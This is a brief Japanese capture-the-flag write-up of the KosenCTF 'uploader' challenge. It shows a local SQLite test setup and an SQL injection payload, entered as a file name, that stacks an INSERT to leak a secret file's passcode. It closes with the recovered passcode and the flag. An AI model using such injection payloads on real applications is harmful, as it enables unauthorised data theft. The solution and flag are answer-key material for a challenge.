uploader
ファイルをpasscodeつきでアップロードできる
secret_file の中身を見たい
passcodeの比較に == を使っている
こういう感じでこしらえて実験する
code:sql
BEGIN TRANSACTION;
/* Create a table called NAMES */
CREATE TABLE files(Id integer PRIMARY KEY, name text, passcode text);
/* Create few records in this table */
INSERT INTO files(name, passcode) VALUES('secret_file','passkode');
COMMIT;
/* Display all the records from the table */
insert into files(name, passcode) values('hoge.png', '') ; insert into files(name, passcode) values((select passcode from files where name = 'secret_file'), 'aaa'); #
SELECT * FROM files;
以下を入れるとpasscodeがファイル名として出てくる(これしか思いつかなかった…)
') ; insert into files(name, passcode) values((select passcode from files where name = 'secret_file'), 'aaa'); #
passcode: the_longer_the_stronger_than_more_complicated を入力するとFLAGが出てくる
KosenCTF{y0u_sh0u1d_us3_th3_p1ac3h01d3r}